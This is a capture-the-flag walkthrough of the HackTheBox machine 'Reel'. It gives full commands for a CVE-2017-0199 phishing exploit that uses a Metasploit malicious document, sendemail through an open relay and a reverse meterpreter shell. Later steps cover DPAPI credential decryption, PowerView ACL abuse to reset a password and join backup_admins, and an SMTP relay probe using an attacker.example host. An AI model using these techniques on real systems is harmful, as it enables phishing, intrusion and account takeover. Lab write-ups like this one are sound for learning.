HTB - Reel

Machine Info
Reel is a medium to hard difficulty machine which requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.
Enumeration
Scope
IP Address: 10.10.10.77
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p21,22,25,135,139,445 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-07-12T12:48:32+01:00
| smb2-time:
| date: 2024-07-12T11:48:30
|_ start_date: 2024-07-12T11:40:43
|_clock-skew: mean: -19m53s, deviation: 34m36s, median: 4s
* Open ports: 21,22,25,135,139,445
* Services: FTP - SSH - SMTP - RPC - SMB
* Versions: Windows Server 2012 R2 Standard 9600 - OpenSSH 7.6
* Important Notes: FQDN: REEL.HTB.LOCAL - Domain name: HTB.LOCAL - Anonymous FTP login allowed
FTP Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
FINISHED --2024-07-12 07:48:01--
Total wall clock time: 3.0s
Downloaded: 5 files, 17K in 0.2s (75.3 KB/s)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ls
10.10.10.77 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ tree 10.10.10.77
10.10.10.77
└── documents
├── AppLocker.docx
├── Windows Event Forwarding.docx
└── readme.txt
I downloaded these files but I found nothing interesting inside them, except the email address of the creator of these files: nico@megabank.com
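A .docx is a zip archive, and the document properties in docProps/core.xml (dc:creator, cp:lastModifiedBy) routinely leak a username or e-mail address even when the visible text is bland. The script below is an added example for this writeup, not the author's tooling: it pulls those properties plus any e-mail-looking string from every XML part. The sample document it builds in memory is constructed here, carrying the address from the page so the script runs offline; point it at real files with extract_docx_identities(path).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces used by docProps/core.xml
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def extract_docx_identities(src):
    """Return creator, lastModifiedBy and every e-mail address found in the
    archive's XML parts. `src` is a file path or a file-like object."""
    result = {"creator": None, "lastModifiedBy": None, "emails": set()}
    with zipfile.ZipFile(src) as zf:
        names = zf.namelist()
        if "docProps/core.xml" in names:
            root = ET.fromstring(zf.read("docProps/core.xml"))
            creator = root.find("dc:creator", NS)
            modifier = root.find("cp:lastModifiedBy", NS)
            result["creator"] = creator.text if creator is not None else None
            result["lastModifiedBy"] = modifier.text if modifier is not None else None
        # Addresses also show up in comments, revision authors, settings, etc.
        for name in names:
            if name.endswith(".xml"):
                text = zf.read(name).decode("utf-8", errors="replace")
                result["emails"].update(EMAIL_RE.findall(text))
    result["emails"] = sorted(result["emails"])
    return result


def build_sample_docx():
    """Constructed minimal .docx (not one of the files from the FTP share)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>nico@megabank.com</dc:creator>"
        "<cp:lastModifiedBy>nico@megabank.com</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"])
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>AppLocker rollout notes</w:t></w:r></w:p></w:body>"
        "</w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
        zf.writestr("word/document.xml", document)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    import sys
    targets = sys.argv[1:] or [build_sample_docx()]
    for t in targets:
        label = t if isinstance(t, str) else "<constructed sample>"
        print(label, extract_docx_identities(t))
```

Run it against the three downloaded files (`python3 docx_ids.py 10.10.10.77/documents/*.docx`) to see which part of the archive carries the address; exiftool gives the same core properties if you prefer a one-liner.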

RPC Enumeration
No data from rpcclient
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
I can't list the shares with cme or smbclient:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.77 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [+] HTB.LOCAL\:
SMB 10.10.10.77 445 REEL [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.10.77 445 REEL [*] Windows Server 2012 R2 Standard 9600 x64 (name:REEL) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB 10.10.10.77 445 REEL [-] HTB.LOCAL\guest: STATUS_ACCOUNT_DISABLED
SMTP Enumeration
Whenever I find an SMTP server, I always scan for open relay to check whether it lets me send arbitrary emails, which can be used for phishing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ nmap -p25 --script smtp-open-relay $ip -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 08:05 EDT
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
PORT STATE SERVICE
25/tcp open smtp
|_smtp-open-relay: Server is an open relay (8/16 tests)
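The probe behind that verdict is simple: a foreign MAIL FROM followed by a RCPT TO for a domain the server is not responsible for; a correctly configured MTA answers the RCPT with a 5xx, an open relay says 250. The code below is an added example for this writeup (not nmap's script and not the author's code) that speaks the exchange in raw SMTP, stopping at RSET/QUIT so nothing is actually delivered. It ships with a constructed in-process SMTP server that can be switched between "relay everything" and "local domain only" so it runs offline; the probe addresses, the REEL banner and the htb.local local domain are assumptions.

```python
import socket
import threading


def _reply(conn, line):
    conn.sendall((line + "\r\n").encode())


def _read_line(f):
    return f.readline().decode(errors="replace").rstrip("\r\n")


def _read_reply(f):
    """Read a possibly multi-line SMTP reply and return its 3-digit code."""
    while True:
        line = _read_line(f)
        if not line:
            raise ConnectionError("server closed connection")
        if len(line) >= 4 and line[3] == " ":   # "250 " ends the reply
            return int(line[:3])                 # "250-" lines continue it


def is_open_relay(host, port, sender="probe@attacker.example",
                  recipient="victim@external.example", timeout=5.0):
    """True if RCPT TO for a foreign domain from a foreign sender is accepted.
    Never sends DATA, so no mail is queued on the target."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        if _read_reply(f) != 220:
            return False
        s.sendall(b"HELO probe.attacker.example\r\n")
        if _read_reply(f) != 250:
            return False
        s.sendall(f"MAIL FROM:<{sender}>\r\n".encode())
        if _read_reply(f) != 250:
            return False
        s.sendall(f"RCPT TO:<{recipient}>\r\n".encode())
        relayed = _read_reply(f) == 250
        s.sendall(b"RSET\r\n")
        _read_reply(f)
        s.sendall(b"QUIT\r\n")
        _read_reply(f)
        return relayed


# ---- constructed fake SMTP server so the probe can be exercised offline ----
LOCAL_DOMAIN = "htb.local"   # assumed: the only domain the fake server accepts


def _serve_one(conn, allow_relay):
    """One SMTP session. With allow_relay=False, RCPT TO for a non-local
    domain gets 554, which is how a properly configured MTA answers."""
    with conn, conn.makefile("rb") as f:
        _reply(conn, "220 Mail Service ready")
        while True:
            line = _read_line(f)
            if not line:
                return
            cmd, _, arg = line.partition(" ")
            cmd = cmd.upper()
            if cmd in ("HELO", "EHLO"):
                _reply(conn, "250 REEL")
            elif cmd == "MAIL":
                _reply(conn, "250 OK")
            elif cmd == "RCPT":
                addr = arg.split(":", 1)[-1].strip("<> ")
                domain = addr.rsplit("@", 1)[-1].lower()
                if allow_relay or domain == LOCAL_DOMAIN:
                    _reply(conn, "250 OK")
                else:
                    _reply(conn, "554 5.7.1 Relay access denied")
            elif cmd == "RSET":
                _reply(conn, "250 OK")
            elif cmd == "QUIT":
                _reply(conn, "221 Bye")
                return
            else:
                _reply(conn, "502 Command not implemented")


def start_fake_smtp(allow_relay):
    """Start a one-shot fake server on 127.0.0.1; return (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        srv.close()
        _serve_one(conn, allow_relay)

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    for relay in (True, False):
        host, port = start_fake_smtp(relay)
        print(f"server relays={relay}: open relay? {is_open_relay(host, port)}")
```

Against a real target call is_open_relay("10.10.10.77", 25); some servers only reject at DATA time, which is why nmap runs sixteen variants rather than this single one.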
Initial Access
Shell as nico
I got a hint from the community that there is a CVE affecting Microsoft Office that allows RCE via phishing emails: CVE-2017-0199.
Since the SMTP server is an open relay, we can send arbitrary emails, so we can craft a malicious document and mail it to nico to get remote code execution. CVE-2017-0199 abuses OLE link handling in Office: the document carries a link to an HTA file that Office fetches from the attacker's web server and runs through mshta.exe when the document is opened. The target therefore has to be able to reach our HTTP server (SRVHOST/SRVPORT) and to connect back on LPORT for the payload stage.
There is a Metasploit module that generates the malicious document and hosts the HTA for it:
msf6 > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf6 exploit(windows/fileformat/office_word_hta) > set srvhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > set srvport 80
msf6 exploit(windows/fileformat/office_word_hta) > set lhost tun0
msf6 exploit(windows/fileformat/office_word_hta) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/kali/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.7/default.hta
[*] Server started.
Send an email to the user we found with the sendEmail command, attaching the document generated by Metasploit:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ sendemail -t nico@megabank.com -f blind@htb.com -u 'Are you Reel!!!' -m "Click me" -a /home/kali/.msf4/local/msf.doc -s $ip
Jul 12 11:27:25 kali sendemail[77146]: Email was sent successfully!
In Metasploit, I got a connection back as the nico user:
[*] Sending stage (176198 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.7:4444 -> 10.10.10.77:58083) at 2024-07-12 11:27:45 -0400
msf6 exploit(windows/fileformat/office_word_hta) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HTB\nico
Get the flag from the user's desktop:
meterpreter > shell
Process 3524 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\nico
C:\Users\nico>type Desktop\user.txt
4b1fa88985d787becfxxxxxxxxxxxxxx
User Flag: 4b1fa88985d787becfxxxxxxxxxxxxxx
Privilege Escalation
Shell as Tom
C:\Users\nico>tree /F
Folder PATH listing
Volume serial number is FFFFFFB9 CEBA:B613
C:.
Contacts
Desktop
cred.xml
user.txt
<snip>
It's a PowerShell credential file, the output of Export-Clixml on a PSCredential object. The password inside is a SecureString protected with DPAPI under nico's user key, so it decrypts only in nico's context on this machine, which is exactly what our shell gives us.

We can decrypt these credentials with the native Import-Clixml cmdlet:
C:\Users\nico>PowerShell -c "$credentials= Import-Clixml -Path C:\Users\nico\Desktop\cred.xml; $credentials.GetNetworkCredential().username; $credentials.GetNetworkCredential().password"
Tom
1ts-mag1c!!!
The machine offers no remote access other than SSH, so let's try to authenticate as tom over SSH:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh tom@$ip
tom@10.10.10.77's password:
tom@REEL C:\Users\tom>
There are multiple interesting files in tom's home directory; I will explore them.
tom@REEL C:\Users\tom>tree /F
C:.
├───Contacts
├───Desktop
│ └───AD Audit
│ │ note.txt
│ │
│ └───BloodHound
│ │ PowerView.ps1
│ │
│ └───Ingestors
│ acls.csv
│ BloodHound.bin
│ BloodHound_Old.ps1
│ SharpHound.exe
│ SharpHound.ps1
Note.txt
tom@REEL C:\Users\tom>type "Desktop\AD Audit\note.txt"
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
The other files are PowerView.ps1, which can be used to enumerate the AD environment and exploit misconfigurations, and SharpHound.exe, the BloodHound ingestor that collects information about the domain.
The most interesting file is acls.csv; I will copy it to my Kali machine after starting a local SMB server (it must accept the username and password given to net use, e.g. impacket's smbserver.py with -smb2support and -username/-password):
tom@REEL C:\Users\tom>net use n: \\10.10.16.7\share /user:blind0bandit blind0bandit
The command completed successfully.
tom@REEL C:\Users\tom>copy "Desktop\AD Audit\BloodHound\Ingestors\acls.csv" n:
1 file(s) copied.
I opened the file and started to explore it manually, as I tried to upload it to BloodHound but it failed for me.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ open acls.csv
Searching for the user tom, I found the following:
* user tom has WriteOwner on user claire
* user claire has WriteDacl on group backup_admins

This is a potential path: take over the claire account, authenticate as claire, and modify the ACLs of the backup_admins group so that we can add ourselves to it; judging by its name it is a high-privilege group. PowerView.ps1, which already exists on the machine, can be used to execute this attack path.
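When the CSV will not load into BloodHound, the same question (is there a chain of abusable ACEs from tom to backup_admins?) can be answered with a small graph walk. The script below is an added example for this writeup, not the author's tooling and not a BloodHound query: it keeps only Allow ACEs that grant a takeover right, treats "controls object X" as "can act as X", and breadth-first searches from a starting principal to a target. The column names and the sample rows are assumptions modelled on the old PowerShell ingestor's acls.csv (the sample is constructed to mirror the two edges found above, plus noise); adjust the header mapping for a real file.

```python
import csv
import io
from collections import deque

# Rights that give control over the object (PowerView / BloodHound edge names).
ABUSABLE = {"GenericAll", "WriteOwner", "WriteDacl", "GenericWrite",
            "WriteProperty", "ExtendedRight", "AllExtendedRights",
            "ForceChangePassword", "AddMember", "WriteMembers", "Owns"}

# Constructed sample; column names are an assumption, not the real file's header.
SAMPLE_CSV = """ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,AccessControlType,IsInherited
claire@htb.local,USER,tom@htb.local,USER,WriteOwner,Allow,False
claire@htb.local,USER,Domain Admins@htb.local,GROUP,GenericAll,Allow,True
backup_admins@htb.local,GROUP,claire@htb.local,USER,WriteDacl,Allow,False
backup_admins@htb.local,GROUP,tom@htb.local,USER,ReadProperty,Allow,False
nico@htb.local,USER,tom@htb.local,USER,GenericAll,Deny,False
"""


def load_edges(text):
    """Return {principal: [(object, right), ...]} for Allow ACEs granting an
    abusable right. Names are lower-cased so lookups are case-insensitive."""
    edges = {}
    for row in csv.DictReader(io.StringIO(text)):
        if row["AccessControlType"] != "Allow":
            continue  # a Deny ACE is not a takeover path
        rights = {r.strip() for r in row["ActiveDirectoryRights"].split(",")}
        for right in rights & ABUSABLE:
            edges.setdefault(row["PrincipalName"].lower(), []).append(
                (row["ObjectName"].lower(), right))
    return edges


def find_path(edges, start, target):
    """Shortest chain of (principal, right, object) hops from start to target,
    or None if no chain exists."""
    start, target = start.lower(), target.lower()
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        for obj, right in edges.get(node, []):
            hop = path + [(node, right, obj)]
            if obj == target:
                return hop
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, hop))
    return None


def describe(path):
    return " -> ".join(f"{p} [{r}] {o}" for p, r, o in path)


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_CSV
    chain = find_path(load_edges(text), "tom@htb.local", "backup_admins@htb.local")
    print(describe(chain) if chain else "no path")
```

On the sample this prints tom [WriteOwner] claire -> claire [WriteDacl] backup_admins, the same chain as above; the Deny ACE and the read-only right are correctly ignored.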
Shell as Claire
Abuse WriteOwner to take ownership of the claire user object. The owner of an object implicitly holds WRITE_DAC on it, so once tom is the owner he can grant himself the right to reset claire's password. PowerView has to be loaded first:
Import-Module "C:\Users\tom\Desktop\AD Audit\BloodHound\PowerView.ps1"
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
Change the password of the claire user:
$pass = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $pass
Now abuse claire's WriteDacl on backup_admins to grant claire GenericAll (full control) over the group. This ACE change has to be made in claire's security context, since it is claire, not tom, who holds WriteDacl on the group (run it as claire, or pass her new credentials with -Credential):
Add-DomainObjectAcl -TargetIdentity "Backup_admins" -PrincipalIdentity "htb.local\claire" -Rights All
SSH as claire and add her to the target group:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh claire@$ip
claire@10.10.10.77's password:
claire@REEL C:\Users\claire>
net group "backup_admins" claire /add
Group membership is written into the access token at logon, so you must log out and log in again for the change to take effect; be fast, too :)
The backup_admins group has full access (F) to the Administrator profile folder, as the icacls output below shows:
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
I tried to get the flag, but it seems I don't have access to it:
claire@REEL C:\Users\Administrator>type Desktop\root.txt
Access is denied.
Shell as administrator
Exploring the Administrator home directory shows several .ps1 scripts:
claire@REEL C:\Users\Administrator>tree /F
├───Desktop
│ │ root.txt
│ │
│ └───Backup Scripts
│ backup.ps1
│ backup1.ps1
│ BackupScript.ps1
│ BackupScript.zip
│ folders-system-state.txt
│ test2.ps1.txt
I found the admin password in one of these files:
claire@REEL C:\Users\Administrator>type "Desktop\Backup Scripts\BackupScript.ps1"
# admin password
$password="Cr4ckMexxxxxxxxx"
<snip>
And we have a shell as Administrator:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel]
└─$ ssh administrator@$ip
administrator@10.10.10.77's password:
administrator@REEL C:\Users\Administrator>type Desktop\root.txt
e622958df7390059522xxxxxxxxxxxxxx
Root Flag: e622958df7390059522xxxxxxxxxxxxxx